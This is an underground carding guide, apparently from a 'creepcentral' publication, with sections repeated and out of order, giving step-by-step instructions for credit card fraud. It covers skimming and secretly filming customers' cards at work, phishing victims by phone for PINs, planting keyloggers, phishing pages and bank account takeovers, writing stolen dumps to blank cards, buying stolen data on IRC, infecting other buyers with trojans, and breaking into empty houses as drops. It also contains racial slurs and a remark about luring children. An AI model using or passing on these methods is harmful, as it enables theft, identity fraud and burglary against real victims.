photoshop to help us along the way, which is what I'll go into now. +Carding "non cardable websites" with fake CC scans and other fake documents +Okay so say you come across a site that will deliver to another house not registered on the card, but they +want verificaton either through phone or scans of a utility bill, credit card or passport. +For this you'll want to get a pay as you go deal for a cheap shitty mobile all in fake details (say a nokia +3210, brick LMAO!), or you can use spoofcard.com to your advantage to help you. Hell if the person's +details you're using is local to you and you're daring then go to their home and beige box from there; it'd +be very convincing. +If they speak to you over the phone have all details in your mind about the item you're carding, have some +bullshit story if you're having it sent to a diff address such as a family member's birthday and you need it +there as quick as possible as it's a last minute thing, or some shit like that. If you're carding multiple sites +at the same time it's easy to get them mixed up, so make sure who it is calling you 1st. +For CC scans and how to do them check the attachments at the end of this file, they explain so much +better than I could. How you use them is once you've made them like the tuts have said to do, you then tilt +them a little bit so it does actually look like a scan. To make it even more believable put some paper in the +scanner (dark shade if you must), scan it and open in photoshop and then put the shopped CC scan of the +front onto it and then do the same with the back, then send the scans to them via e-mail or post. Same +goes for utility bills (can be got through trashing or your own, and then edited in PS). +Do not use the same designs when making your CC scans, otherwise it will become too obvious. To give +you a head start on mastercards (what I recommend for n00bs to go for) I'm giving you a globe hologram +image so you won't have to buy them in IRC; unfortunately all of my visa hologram pics are shit, but I'm +working on getting a good one soon. + +VISA hologram pic coming soon! +Carding whilst on the job +Getting CC, CVV, CVV2 through use of mobiles +Believe it or not giving your information out to anyone anywhere is not a wise choice, you can not trust +anyone in this day and age. Yes there are carders working on the inside in places where there are a lot of +people around flashing off their plastic cash and using them freely without a care in the world. The most +common of places for a carder to work at are brand label clothing stores such as Limey's, Charlie Brown's +and all the other trendy shops. +Ever noticed when yourself or someone else has paid at the desk with a debit card or credit card that they +bring out a keypad from under the desk, then put your card into it and have the buyer input the pin? Think +again when they take your credit card and go under the desk with it to get the keypad, they are doing +more than just that; just because they're not taking the card and running off with it does not mean they're +not stealing your information. A friend of my dad used to card and work in a clothing store, he used to +have a piece of play doh stuck under the desk and he used to press the card onto the piece of play doh, +unfortunately he began doing it too much and because he'd gotten away with it so many times he became +careless and got caught out by a co worker and from what I know he is still doing time. The moral is, be +careful with the play doh method. The unfortunate thing is you can only get the full info of 2 cards at the +max, and you don't know exactly if you're pressing over the info of another card already put on to the play +doh. Also you can't get the CVC through this method, I was just giving a classic example from the olden +days. +But there is a new wonderful invention called cameras, video recording, and mobile phones and they are +even all working on the same thing. It's best to test it out 1st and have a camera on your phone that is at +least over 2 megapixel and allows long enough video recording times. The phone is set to video record +and on a lighting if needed, and taped underneath the desk for you to record both sides of the card for all +the information you need, as well as being quick you can get a lot more than 2 on, depending on how long +each recording lasts, you may need to start more than one recording. +You need good reason to be going under the desk to get the chip and pin machine, so make the desk look +cluttered up and put shit in the way of everything, such as coat hangers and various other items; or you +could just flat out bullshit the customer and say that the chip and pin machine on the desk isn't working so +you need to get the other one, take their card and then go under searching the desk and quickly show it to +the camera phone and then get the chip and pin machine and put the card in it and then hand to the +customer to put in their pin as normal, unaware you have a CVV2 to later use when shopping online. +Skimming whilst on the job +For skimming you'll want a mini portable MSR500M reader that can be fitted on your waistline belt or of +course once again under the desk, if you're a cashier. But you'll also want a MSR206 writer if you plan on +writing the tracks to an embossed CR-80 piece of plastic later (you can make these yourself but +embossers are expensive and it's an expensive procedure, so wait a while until you do that yourself and +buy them from IRC (be careful, people like to rip with plastics, or you'll get shit quality if you don't watch +out). +If you plan to just sell the dumps on IRC then that's fine, but you'll still need the PIN as well, so if you're +a waiter you can get a cheeky peek at them putting their pin into the chip and pin device while you keep +hold of it slightly (have them put the pin in while they're sat down and you're standing up). It's much +easier to skim in a restaurant rather than clothing retail, as you don't have to think it out and set it up as +much. You can keep the MSR500M in your front pocket of the uniform you're wearing and pretend to be +giving the card a clean on the sleeve (bullshit and say the device won't read it), while really you're giving +it a swipe into your reader. This way the person doesn't even get suspicious because you don't take their +card out of sight with them. I guess you could do that technique with clothing retail too when you get +their card in your dirty little hands, but peeking for the PIN is harder or you'll have to have a friend +shoulder surf for it (or if they're on the next register have them use a sony cyber shot c902 camera phone + +and pretend to have them talking on the phone while really they're recording the person next to them +putting in their PIN; cybershots are really inconspicuous looking with their cameras and VERY clear +[5mpixel]). +I'll go into detail what to do with the dumps you have later in the instore carding section. +Using carbonless receipts to get details (pretty outdated method) +If the store you work at hasn't gone carbonless on the transactions information then you can get most of +the info from the receipt you get a copy of for yourself and note down the pin on this as well when/if you +get it. +Trashing +Trashing for receipts and credit reports (pretty outdated although still works) +Ever heard the expression "Another man's trash is another man's gold"? That's exactly what this is. You'd +be surprised how many people haven't heard of a paper shredder or bonfire. They just dump their +financial records containing SSN's/NI, full name, address, bank, credit card number, CVV, CVV2 etc. All +on forms people couldn't be bothered to dispose of properly because they thought they were JUST old +records. Again carders wok on the inside again for when they want to do trashing, a lot of janitors wear +rags but you'd be surprised how secretly rich most of them are (along with the other shit they steal from +work as well). But also from this if there is not enough info for you on the forms then there is definitely +the phone number of the mark on the form that they've scrapped; almost always, and if not then there is +enough info on their to look them up in the phone directory. Then of course you use social engineering +skills over the phone to get the extra info that you need. If you know of a store that is not carbonless, then +go trashing in the bins at the back of the store for the receipts with the credit card details on it. +Phishing over the phone +Phishing over the phone for details +Ever had telemarketers ask for your credit card info over the phone? (this is if you haven't already hung +up by just hearing a nigger or paki on the phone) chances are they're a carder. Believe it or not there are +people actually stupid enough to fall for these obvious scams. Even more people fall for this if they +believe that the caller is from the credit card company itself or part of the secret service or credit fraud +investigations; the FBI, CIA and police have nothing at all to do with credit card fraud believe it or not. If +you sound professional or part of an important group such as investigations then people are more likely to +comply with you if they believe that their card has been used for credit fraud purposes and have to give +their credit card info and billing address for verification. The best time to call up the mark is when they +are at work as it'll take them by surprise and they'll be wanting to get it sorted asap so that they can get +back to work. Also if it's "serious" then the secret service don't wait for you to finish work before they +question you. Play along well to the part you're pretending to be. Some social engineering skills are +required and you must gain the experience of lying to people yourself. Before calling up the person find +out as much information about them as you can. +If you've stolen a CC from someone personally you can call them up pretending to be their bank and tell +them there has been some suspicious charges made to the credit card from places such as South Africa, +Nigeria, Turkey, Russia; places like that, get them to confirm their details (milk as much as you want out +of them, ask them bullshit security questions such as their mother's maiden name, address, etc; you may +as well, it'll make it easier to get a COB for you to use). +You can also get their PIN out of them if you want as well by either straight out asking them to confirm +it, or be crafty and after you've told them to verify their PIN you're putting them through to a different +department; then play some cheesy music down the phone for a few mins, have a female voice recording +(use AV vocie changer) asking them to input their PIN on their dialpad (this won't be as suspicious); get +these recorded so they can be decoded with DTMF decoding hardware/software later (although it's +expensive). Guessing DTMF tones is pretty easy too, but you need to know what each tone sounds like, +it's preferred to use decoding software to ensure you have it correct. +If you try hard enough you can get full info about anyone over the phone (I suggest using spoofcard for + +this). +Keylogging for CVV2s +Hardware keylogging +First of all it's best if you use hardware keyloggers here that you put into the keyboard of a computer +belonging to an area where a lot of people are going online a lot and logging into e-mails, ebays, paypals +etc, pretty much giving you enough info for you to go searching through if you get in their e-mails, or +maybe you're lucky enough to get someone who is buying something online anyway. Get the keyloggers +from here: +Code: +http://tyner.com/datalogger/keykatcher.htm +And come back within 2 days time or so and collect the keylogger after doing some browsing yourself (as +to not look suspicious just coming in and then leaving a few seconds later). +Or of course you could set one up in a business and do the classic call in and do some social engineering +from the credit card company or secret service and have them go to the bank online and have them log in +to verify, or maybe even have them log in to a fake bank online made by yourself that will collect +anyone's info who logs in on it. +Carding Instore +Instore carding is the act of skimming a credit card and writing the dumps and track1+2 to a CR-80 piece +of plastic and then either cashing out at the ATM or shopping for goods instore, as long as you have the +PIN as well through whatever method you choose to use. +How it's done is through the use of thejerm software or any other magstripe utility software (thejerm is +the best to use). And you do it like this: +Written by: Acetrace +1. Load up thejerms software +2. hit settings tab +3. hit "Defaults" in Leading Zeros box +4. hit "75 bpi" in Set Track 2 density box +5. go bak to actions +6. hit LoCo or HiCo in Coercivity box, depending on which you want to do +7. input your tracks 1 & 2 (without the % ; or ? symbols because the program already does it for you) +8. hit Write Card and swipe your card. (i usually do a read card afterwards to make sure everything went +ok) +9. GO SHOPPING!!! +Download thejerm from here: +Code: +PM ME FOR DOWNLOAD LINKS (OMNISCIENT) +I was a member of this site and it came from there so don't worry about it not being safe, I used this +software a lot back in the day. +Now how you should act when you go carding instore is pretty much common sense, but some people get +caught up in the moment with nerves, cockiness or just too much weird amounts of excitement. + +Simple what you do, make sure you KNOW the PIN for the card you're using before you go, don't be +stuck at the counter trying to remember it. If you're going to be carding expensive goods then dress smart +for the occasion, wear brand named clothing (that you've previously carded ) or even a suit. It would +look suspicious someone with a hoodie going into a store and buying a Louis Vuitton watch, so walk in +with style. When you go instore, you ACT like you are using your own card, because essentially that's +what it is (well it is now anyway lol) no looking shifty and don't look at the fucking cameras; the cameras +mean nothing anyway, they don't know your name or where you live, they're not being watched half of +the time, so stop worrying about the fucking cameras; remember you're doing nothing wrong. When you +go in, don't rush take your time, browse around some other items. Find the item you want to card and +even ask the employee simple questions about it (if it's a TV or comp just ask questions about certain +specs and if it's good for playing video games on). You'll be most nervous at the checkout, just act as +normal as you always have been, don't make too much small talk but be polite and civil. Once you have +the good sin your hands don't bolt out the door, just say thank you and then casually walk out the door, +get to your car and then celebrate all you want. +Carding over the phone +Okay 1st of all do not be a dumb fuck now, do not call from your own phones at all. For extra lulz you +could use a beige box and call from someone else's phone but that's a totally different game all together +and is also a major felony to go agains tyou on the chance that you do get caught so we'll keep it simple +and use a payphone (it's not AS risky to phreak these but the only recent red box tones I have are from the +year 2007 and I'm pretty sure they'd have changed the system again...bastards, I'll check sometime though +. The next day postage is said so that they have less time to look up details on the order. Some cards will +have difficulty shipping to any address other than the billing address, but it doesn't hurt to try. If they start +to question you then just answer the questions and talk your way around the situation with your social +engineering skills; don't just run away from the questions or hang up straight away, otherwise that is +cause for suspicion and they may investigate. If all goes well you should have your item of choice +delivered to your drop location or a house of someone else's address who you don't know and call them +up saying that you called up the store and they've sent the package to the wrong address and it is still +sending there, and ask them if they could kindly keep and sign for the package and you'll pick it up after +work (this is a last resort and only to be tried if you're good at talking to people, which you should be if +you're a carder). I recommend checking out the section on drops later on in this text. +I recommend using spoofcard for verification over the payphone, if they need to verify (if they won't send +without some verification which is usually the case). +IRC +Services provided in IRC +IRC is the main gathering for fellow carders, scam artists and rippers. To put it in a nut shell, IRC is THE +black market, unlike craigslist and eBay which are just black markets. You can get anything illegal off +IRC from CP to warez to CC details (which is what we want). +To concentrate on carding though you can buy: +CVVs +CVV2s +SSNs +Utility bill scans +CC scans +COB (a service to get someone to call up the victim's bank and get the billing address changed to your +drop) +Payment for using someone else's drop and then sending to you +Spyware +Fake ID/ ID scans +DUMPZ +Phisher pages +The list really is endless + +There are a lot of advantages to using IRC networks and channels which I'll go into now: +- The channels are often underground and not known to many people, so they're harder to stumble upon +by some random guy. +- The messages can be encrypted so they can't be read by anyone happening to be on the network sniffing +the traffic. This makes it harder for investigators to uncover. +- Easier and quicker to communicate with mass amounts of like minded people. +- Variety of channels to go to if one doesn't suit you (there are MILLIONS and new ones being made +every second, guaranteed). +- And of course a varity of services, if you need something you can bet someone from the other side of +the world will be willing to share or/and sell to you. +There are a lot of disadvantages though, IRC is the equivalent of a backstreet alley, you'll be fine if you +stay cautious, here's what you should be weary of: +- Viruses +- If you don't have strong anti viruses and firewalls you will get infected (no norton shit, kaspersky and +NOD32 are what you want) +- Do not accept random .exes or any file for that matter +- It is easy to get ripped off, choose your forms of payments and who you deal with wisely +How to find carding channels (Will not go too much into this as there are secrets between fellow carders +which we like people interested enough to find out for themselves) +Here is the most commonly asked question I get asked by n00bies and fellow carders; where do you find +these channels? +If I'm being totally honest the best place to find out about them is through Nigerians; no bullshit that is +where I found out about a lot of the carder channels I used, also how I found out about forums and their +IRCs too such as cardersplanet, darkmarket etc. How I found him out was just on a normal scam bait I +was doing, it wasn't a long one, but in the end he tried phishing me so I tried back and we had a laugh +about it; I was straight up with him and told him I wanted to get deeper into the game, I looked up to his +type of people and wanted to get rich/successful (I also shared the double claim secret about paypal with +him which got him trusting me a little bit) he then sent me an invite to cardersplanet (this site was full of +Nigerians). Eventually I went in the IRC (admittedly got ripped a few times) then started vending myself +under various diff nicknames, then moved onto different sites like darkmarket and cardingzone when I'd +got invites for them (although cardingzone is shit it's good to get in the IRC for starting off, you'll get +invited to better forums the more you hang out in IRC, trust me). Don't ask me for invites to cardingzone, +I was banned for ripping (I didn't rip anyone :angry +The quicker way is to use these and search for certain keywords: +Code: +http://www.irclinux.org +http://www.irctrace.com +http://www.irclog.org +http://www.rcarchive.info +http://www.irc-chat-logs.com +http://www.irseek.com/ +And of course don't forget google. +I'm only going to give you one clue for searching through google for a carding IRC, and that word is +"undernet". +Fellow carders don't like revealing their IRCs, and for obvious reasons. + +My advice is find a scammer through e-mail, and chat to him; be witty with it but be respectful to a fellow +fraudster. +Vendors and how to approach them +Vendors are the people in IRC who are selling and providing the services for you. There are certain ways +you should speak to vendors otherwise they're going to rip you (remember this is the black market, this is +just like going up to a random drug dealer in the street and not knowing what you really want or what +you're getting into; you'll get ripped off). Ask as many questions as possible of what you want to know, if +you're buying a CVV2 ask to see proof of their details working (get them to make a small purchase +somewhere; they should show you a before and after and the limits that are there on the card [there are +methods out there of checking your balance; you can even get it through text/sms]. This is a market so +remember there are more people that will be willing to buy from that vendor, it's open for all, you can get +a full load of info including dumps for as low as ?3/$5, drops usually go for ?7; if someone is saying +higher prices don't be afraid to haggle down to these prices or a little bit lower. COBs go for a little bit +higher in ranges of ?15-?20 because the vendor needs to get full info on someone and then change the +billing address through the bank to where ever your drop is. +Now when you go in the channel don't fucking say or request anything, shut up and see what the vendors +are saying they have to offer and then send them a private message and talk to them. If any "vendor" +messages you 1st trying to push onto you to buy from them then they're most likely a ripper; however +don't piss off the rippers or assume someone is a ripper because you never know who is going to be there +to help you out later on down the line or who might be pissed off enough to fuck you over. +I can't give any big advice on not getting ripped in IRC because you don't personally know anyone in +there at all, you just have to take your chances (expect to get ripped your 1st few times going in there, just +don't go to them again, because if they get away with it once they'll definitely try again if you go back to +them). +DO NOT BUY ANY WU BUG(Western Union Bug); it is a massive ripper technique which is bullshit. +The WU BUG used to work but was patched a looong time ago, most of the time now you'll get nothing +or you'll end up with a rootkit on your comp. Rippers always say ridiculous prices for these too such as +$200+; but if someone says lower prices it's still bullshit and most likely a rootkit/trojan/keylogger going +to be installed on your machine while you get some useless program that does nothing. +Ripping +Easy as hell to do, not much photoshop skills needed really either. +Bullshit and say you're selling full info (you're getting the info from fakenamegenerator.com or any credit +card gen program; of course they don't fucking work), if they want to see proof just use your own legit +CC or another stolen CC to buy something and show them proof of you buying it, except photoshop the +details to that which you're going to be giving him later. Take payment through Western Union ONLY +(since e-gold isn't around anymore), then just send him the bullshit info. +If they want the report to go to their phone via SMS then just spoof a text with an sms bomber saying +some bullshit reports. Then get the payment via WU. +To get victims you message them 1st, message out in the whole channel 1st and then PM random buyers +(look for ones requesting). +::::WU BUG:::: +seriously this is bullshit, all people are doing are showing buyers fake screenshots made in PS or are +actually making quick programs themselves and taking screens of them and then selling them, although +essentially they're useless. You want to do this, but you want to actually send them a file as well, but bind +a keylogger or trojan to it; not only can you rip them out of their cash to buy your infection but the info +you get from spying on them will be so much more as well ranging from their info to other stolen CC +info, you'll have a backdoor on what they do and can exploit it. + +If you can't be bothered making fake screenshots then get them from other rippers trying to sell them, get +them to show you pics, vids and info; then use it for yourself and rip some n00bs. +Phishing for Change of billing +A billing address is the details used for a person's bank account and most often their credit cards and +everything else too, this includes their phone number too. +What a change of billing (COB) is in a nutshell is changing the billing address registered to the card to +your drop address you're gonna be using. When you want to card BIG at various online websites the +orders will look more legit that you're not sending it else where other than the one registered to the card +(obviously after you've changed the billing address), meaning the delivery of your goods will be quicker +and will require a lot less verification. +Most of the time you change the billing address over the phone but SOME banks will let you do it online; +when you phone up to change it you use spoofcard.com or the pay as you go mobile phone you're going +to be using when carding, or beige boxing +When changing the billing address you need to know as much info as possible about the person's billing +address you're changing, because the bank is going to ask you 3 security questions you set (such as +mother's maiden name) before they change it. +You can phish for details over the phone (see the phishin over the phone section above), however it's best +to use keyloggers and phisher pages for this with a MIX of over the phone. +Use through phishing pages +2 methods here, 1 including over the phone, one isn't. +The method without the phone is to just send a ton of e-mails out to random people and send them a html +e-mail telling them they need to update their information before the account is suspended or their account +with the bank will be cancelled, you have them go to a phisher page off the template and the phisher +pages "requires" them to answer security questions like their mother's maiden name, their pet's name, you +know those type of questions. +Another method is to call them up pretending to be the bank and saying there have been different ip +ranges logging on their account and they need to confirm their details online, link them to the phisher +page and have them fill in the details; have the phisher page redirect to the actual online bank's login +page; then ask if they've done that over the phone, tell them to wait a minute while you confirm and check +it all out, say it's all clear and tell them to log in, they'll think nothing of it and you now have the answers +to their secret questions which you can give to the bank itself when you go to change the billing address. +Use through keylogging +This is my favourite method and what I told S_E last night in IRC. +You have a hardware (or software) keylogger set on someone's comp, use sock proxies when logging into +their online bank account and then change their password, call them up pretending to be the bank and then +get them to go to the actual online bank link and fill in their forgotten password options (answering secret +questions) or of course get them to go to your phisher page and fill in the details (this is if you want to +add more fields to get more info) then pretend to be checking it all over, then change their password again +to some random letters and numbers and give it to them to log back in (it doesn't matter because they're +keylogged and you'll get their new login if they change the password again anyway), you'll have all their +info logged down too for you to answer your questions when you call the bank. +Best time to do all of this is around the 10th day of the month (people usually get their credit reports at +the start of every month), this will give you plenty of time to card enough for the remaining days until +they see they're not getting their reports coming to them anymore (if you're crafty you can pretend to have + +cancelled the online bank account for them after they've gave you the info you need to know; I used to do +this method and keep it going without them knowing). +You need as much info as possible when calling up the bank to change the billing address. +Drops and what you need to know about them +Drops and what you need to know about them +What drop locations are and what they?re used for +Well simply a drop location is an abandoned house, or any house that is not under your name or any of +your details. You can lead young children into these to make a sexy time with them, get items delivered to +them that you want no one else to find about or risking finding, or just use it to squat in if you have no +where else to go. Basically they are used in ways of keeping your nose clean and are used by mostly scam +artists and sex offenders. +How to find a drop location +There are many ways of finding a drop location for use, whether it temporarily or permanently (although I +suggest swapping and changing locations because my main last one I used got raided or broken into and +is boarded up and too hot to use); I will suggest 3 ways on how you can find some for you to use. +One final tip is don?t bother going for houses that are boarded up at the front where it is visible to passers +by (it?s okay if round the back is boarded up) +Way #1 +As just mentioned you can go about it many different ways but one of the ways the way I prefer to go +about it is you should be looking around some older housing estates and more ghetto areas (could also tie +in with the sob story you feed to a paedophile/child predator you are possibly scamming). For example in +Derby there is an area called Sinfin, but now there is 2 parts to it and they are New Sinfin and Old Sinfin. +Old Sinfin is the are you would want to go to, because it?s older it?s most likely to be alot more houses +abandoned or deemed unsafe (it?s bullshit). +Or if you were lucky like I once were then you could ask around your mates if there are any empty houses +in their area. If there are then you?re in luck and can even have your friend keep tabs and watching over it +for you and give you details so you can keep it all under wraps and safe. It may be alot riskier with +neighbour hood watch morons, and nosey neighbours, but it?s still ideal and a little bit less suspicious +than the abandoned houses in the older estates, and this is because the older estates usually have all +abandoned houses close by, where as the odd one out covered with a street filled with inhabitants will +seem less suspicious to the postman. +Way #2 +Now this is a temporary way of finding a drop location, but is sometimes an effective ways and means of +getting what you need but has a bit more risk to it; and personally is a way I have never used even till +today. +Have you ever been eavesdropping on a conversation between a neighbour and one of their family +member?s or friends?, or been down the pub and heard the common as muck chavs boasting about a +holiday they are going away on for however long they say they?re going away for? +Well listen out for these type of conversations. Because them away on holiday means the house is most +likely going to be empty for however long they?re going away for. So if you already know where they +live then that?s great the job is made easier; if you know their first name and surname then look them up +in the phone directory and find their address to go along with the number. If you don?t know where they +live, or their name then just listen out to see if you can hear their names come up in conversation; just +remember that if it?s in the pub it?s most likely local to it that they live, so you could easily find out by +following them home and seeing. +Way #3 + +Possibly the safest, easiest way of finding, and quickest way to get a drop location. +Most areas have houses up for sale am I right? +Or houses that are up for bidding on, am I right? +Well they have a website with a full list of your local area(s) that have houses up for bidding on and for +sale. +For example I would search Derbyhomefinders and look at the list on their site. +All of these houses are empty and often do not have a sign up outside them either (if they do then just +take it down and hide it somewhere for the time being). +The advantage to using the lists to find the drop locations to use is it will usually say when the bid is up or +if the house has been sold (this lets you know that it will not be ideal to use that certain house now it?s +most likely to be inhabited) and will have the houses on there that are still being bidded on and that are +still up for sale, these are the ones you want to be using. +The best thing about this though is that you have a full list of many different drops to use (like I said +earlier it?s best to switch drop locations and use many different ones) and it is updated with new ones +coming up and tells you full which ones are over and not usable. +You just need to know your agencies for housing and find their website. +Obtaining and using drop locations +You?re probably thinking now I?ve got/found one that?s great and everything but how the fuck do I keep +it a secret? +for way 1 +this much is obvious that you do not tell anyone except your partner if you?re doing a team bait, and 1 +trustworthy friend to keep tabs on it if you are doing a bait on your own, and also the paedophile, but only +when he asks. But there is alot more to it than that, also maintaining your abandoned house and making +the postman think someone living there. +Appearance isn?t everything at all in any case and it isn?t for this either, but of course you try to make +yourself look as best as you can. The same principles are applied to keeping an abandoned house; you +should atleast try to get a new lock put on the door which you will also have a key for; just so that if any +druggies go there before you then they will have a tougher time getting in (of course it?s ideal you don?t +get somewhere known to druggies but this is an example of what use it could have) but also if there is a +fucked up lock on a door then it?s pretty damn obvious only low life scum or some criminal(s) are using +the place, so buy a new lock for the door and get it fitted on, whether you do it yourself or get assistance +from a friend who knows what they are doing. +Now as for overgrowing plants and weeds, you can only do so much without being suspected. Do not use +a lawn mower, use clippers and hack it as short as you can. It?s best to get all of this done when everyone +is at work during the day time; but in reality it isn?t ideal at all and most criminals don?t tend to bother +with this. Instead they will make it seem someone is in but is just too ill to do anything with the garden or +is just a lazy fucker. They do this by often writing up a note and sticking it to the door or leaving it on the +floor near the door saying something such as "No milk today please" or "Not in, please leave packages at +post office". +Write a few letters to yourself aswell ready to come on the same day as the parcel, this will make it look +like you get mail and not just the one off suspicious package now and then. +Now 2 alternatives, you can either get to the abandoned house and take the mail from the mailman while +acting like you live there (you must look the part as lazy or disabled if you have ingrown plants in "your" + +garden) or you can leave a note saying to take any packages to the post office for pick up because you are +at work or something along those lines. +One final rule is do not be in and out of the hideout everyday or whatever, visit probably 2 or 3 times a +week. +Way 2 +Now there are 2 ways to go about this; you can either just get to the house early in the morning a little bit +just before the postman arrives and be at the house outside pretending you?re just about to leave and then +sign for the package (if you need to) and collect it off the postman and then be on your way after he?s +gone. Or if you?re good at bypassing alarms (I have a guide on burglary) or the house has no alarm then +you could bump key in at night time (not recommended) or during the day time the day before when +everyone else will be at work aswell, and hide out there for a bit (hell even take some food that is left in +the fridge and feed yourself since you?re spending the rest of the day and early morning there). Basic +rules are don?t have tv on too loud if at all, or if you do then put head phones on into the tv if it?s that old +of a model, and leave everything how it was left an say upstairs so incase any neighbours or anyone +looking after the house while the owners are away come in then you have time to hide. +Obviously if it?s a package you don?t have to sign for then you can stick up a note on the door early in +the morning before the post man comes saying to leave it round the back or what ever excuse you wanna +make up. +Way #3 +Easy, just as previously except you don?t have to be as cautious and often the alarms are disabled for that +time being anyway so you don?t have to worry as much if you bump key into it. +As also stated previously in this guide, if there are any up for bidding/for sale signs then take them down +and just get them out of the way. +You can even go to this one the night before instead of day time because no one is hardly going to be +watching over this unless it?s in a neighbourhood watch area (in which case you chose the wrong area +anyway, you dumbass). +Some basic tips to keep in mind +-- Be there before the postman! can?t stress this enough, it?s too fucking obvious if you?re late. +-- When signing for packages, if you need to, then sign a fake signature (the sig can be any made up fake +shit) with your hand that you don?t write with, so it?s harder to trace incase things go tits up later on +down the line. +-- Take anything in any guide with a pinch of salt, things may be different circumstances for you and your +situations. +Carding I +This is a creepcentral publication +Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing +addresses +Including drops and what you need to know;Huge guide written by me + +Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing +addresses +Including drops and what you need to know;Huge guide written by me +kay major updates done to this carding yext, it will cover the basics of most carding knowledge. Going +into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2 +different categories of their own. +kay major updates done to this carding text, it will cover the basics of most carding knowledge. Going +into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2 +different categories of their own. +What I'm going to cover: +Online Carding +- A quick overview of what online carding is +- SOCKS and why we use them +- Finding a cardable site and what cardable means +- Carding "non cardable websites" with fake CC scans and other fake documents +Carding while on the job +- Getting CC, CVV, CVV2 through use of mobiles +- Skimming whilst on the job +- Using carbonless receipts to get details (pretty outdated method) +Trashing +- Trashing for receipts and credit reports (pretty outdated although still works) +Phishing over the phone +- Phishing over the phone for details +Keylogging for CVV2s +- Hardware keylogging +Carding Instore +- What instore carding is (very brief) +- How it's done +- How to act and present yourself instore +Carding over the phone +- Carding over the phone +IRC +- Services provided in IRC +- Advantages to using IRC for info +- Disadvantages +- How to find carding channels (Will not go too much into this as there are secrets between fellow carders +which we like people interested enough to find out for themselves) +- Vendors and how to approach them +- How to rip in IRC (EVERY vendor, reliable or not has ripped some n00b who acted like they knew +what they were doing) +::::WU BUG BULLSHIT and how to rip n00bs and gain more:::: +Phishing for Change of billing +- What COB is and why it's useful +- Use through phishing pages + +- Use through keylogging +Drops and what you need to know about them +- Drops and what you need to know about them +What carding is +Carding summed up quickly is the act of obtaining someone's credit card information, from the CC#, +CVV, CVV2, CVN, and the billing address, along with the expiry date and name of the person the card +belongs to along with a signature. +Online Carding +Online carding is the purchasing of goods done over the internet with the CVV2. +Now for you n00bies you're probably wondering what a CVV2 is, it's simply just the database of basic +info for the card such as the card type (e.g. Mastercard) First and last name, address and post code, phone +number of the card owner, the expiry date (and start date if it's a debit card or prepaid CC), the actual CC +number and the CVC (card verification code, which is the 3 digits on the back of the card). +This is the format you usually get them in when you buy off IRC: +:::MC ::: Mr Nigerian Mugu ::: 1234567890123456 ::: 09|11 ::: 01/15 ::: 123 ::: 123 fake street, +fakeville, ::: Fake City ::: DE24 TRH ::: 01234-567890 ::: +SOCKS and why we use them +Now with ANY fraud at all you have to take precautions so you don't make it easy for anyone to catch +you in your wrong doings. As usual I swear against TOR for carding/scammin because most nodes are +blacklisted by websites and because TOR cycles through various different proxies; and even if you +configure it to go straight through an exit node of your choice it's still not worth it. You can use JAP but +make sure you're using some constant sock proxies from the same city, town or area that the card is from; +also go wardriving and use a VPN (don't trust anyone off IRC with these, you'll have to do some +searching around yourself for a highly trusted one and one which won't comply with LE). +You can get good SOCKS from anyproxy.net (people are selling accounts for the site in IRC all the time), +that's the best place but even I ended up losing the account eventually (unknowingly I was sharing it with +some Nigerian dude who became selfish). +So we use SOCKS because they stay constant. But don't let that get your guard down, you want FRESH +proxies everytime you card. +Finding a cardable site and what cardable means +Basically a cardable site holds these characteristics and what you should be looking for to determine an +easily "cardable" website: +- The top one you need to look for on the site's TOS is that they send to any address and not just the one +registered on the card (although you can easily get around this if they don't, with a COB, photoshopped +verification (will go into detail later) or some social engineering over the phone). +- The next important to look for is if they have a visa verification code or mastercard secure code (most of +the time if you ask your vendor they'll include them in your CVV2 details textfile), if they do have one of +these you have to put in and you don't have them then don't waste your time +- If they ship internationally (for obvious reasons, but you can just stick to local websites and order to +your local drop) +- If they leave packages at the door when no one's in, or around the back in a safe area (I know of one site +in the UK that has all these qualities including this one, it is perfect for carding clothes) +- Also you can't forget to see what other security checks they need to do (if they need to call you up to +verify or want a utility bill, passport or a scan of the actual CC) +It is hard to find websites online now that have most of these qualities, therefore we have to use COBs +and photoshop to help us along the way, which is what I'll go into now. + +Carding "non cardable websites" with fake CC scans and other fake documents +Okay so say you come across a site that will deliver to another house not registered on the card, but they +want verificaton either through phone or scans of a utility bill, credit card or passport. +For this you'll want to get a pay as you go deal for a cheap shitty mobile all in fake details (say a nokia +3210, brick LMAO!), or you can use spoofcard.com to your advantage to help you. Hell if the person's +details you're using is local to you and you're daring then go to their home and beige box from there; it'd +be very convincing. +If they speak to you over the phone have all details in your mind about the item you're carding, have some +bullshit story if you're having it sent to a diff address such as a family member's birthday and you need it +there as quick as possible as it's a last minute thing, or some shit like that. If you're carding multiple sites +at the same time it's easy to get them mixed up, so make sure who it is calling you 1st. +For CC scans and how to do them check the attachments at the end of this file, they explain so much +better than I could. How you use them is once you've made them like the tuts have said to do, you then tilt +them a little bit so it does actually look like a scan. To make it even more believable put some paper in the +scanner (dark shade if you must), scan it and open in photoshop and then put the shopped CC scan of the +front onto it and then do the same with the back, then send the scans to them via e-mail or post. Same +goes for utility bills (can be got through trashing or your own, and then edited in PS). +Do not use the same designs when making your CC scans, otherwise it will become too obvious. To give +you a head start on mastercards (what I recommend for n00bs to go for) I'm giving you a globe hologram +image so you won't have to buy them in IRC; unfortunately all of my visa hologram pics are shit, but I'm +working on getting a good one soon. +VISA hologram pic coming soon! +Carding whilst on the job +Getting CC, CVV, CVV2 through use of mobiles +Believe it or not giving your information out to anyone anywhere is not a wise choice, you can not trust +anyone in this day and age. Yes there are carders working on the inside in places where there are a lot of +people around flashing off their plastic cash and using them freely without a care in the world. The most +common of places for a carder to work at are brand label clothing stores such as Limey's, Charlie Brown's +and all the other trendy shops. +Ever noticed when yourself or someone else has paid at the desk with a debit card or credit card that they +bring out a keypad from under the desk, then put your card into it and have the buyer input the pin? Think +again when they take your credit card and go under the desk with it to get the keypad, they are doing +more than just that; just because they're not taking the card and running off with it does not mean they're +not stealing your information. A friend of my dad used to card and work in a clothing store, he used to +have a piece of play doh stuck under the desk and he used to press the card onto the piece of play doh, +unfortunately he began doing it too much and because he'd gotten away with it so many times he became +careless and got caught out by a co worker and from what I know he is still doing time. The moral is, be +careful with the play doh method. The unfortunate thing is you can only get the full info of 2 cards at the +max, and you don't know exactly if you're pressing over the info of another card already put on to the play +doh. Also you can't get the CVC through this method, I was just giving a classic example from the olden +days. +But there is a new wonderful invention called cameras, video recording, and mobile phones and they are +even all working on the same thing. It's best to 